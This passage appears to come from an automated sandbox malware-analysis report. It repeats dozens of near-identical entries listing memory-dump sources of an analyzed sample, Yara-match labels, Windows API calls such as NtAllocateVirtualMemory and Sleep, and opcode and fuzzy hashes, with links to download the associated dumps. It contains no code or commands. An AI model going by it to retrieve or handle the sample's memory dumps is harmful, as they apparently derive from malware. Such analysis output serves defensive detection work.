                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                                                                              • Opcode ID: 5618aa2f209efc6c7e4280da79ed3f1d50794ea5f3fd7f2e2b30a51a79370972
                                                                                                                                                                                                              • Instruction ID: c643061aec1540db3083e8d997663fa09147e6a2cc94bca8e4b705a5c51cd1a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5618aa2f209efc6c7e4280da79ed3f1d50794ea5f3fd7f2e2b30a51a79370972
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20110CB6200219AFDB14DF88DC85EE777ADEF88750F118559BA1997282C630F911CBE4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                              • Instruction ID: 72d1ccd54e935cf078bb80c6ba408fef1e417173842e08f16d131c4ef81a8ae4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCF015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897281C630F810CBE0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00096F98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep
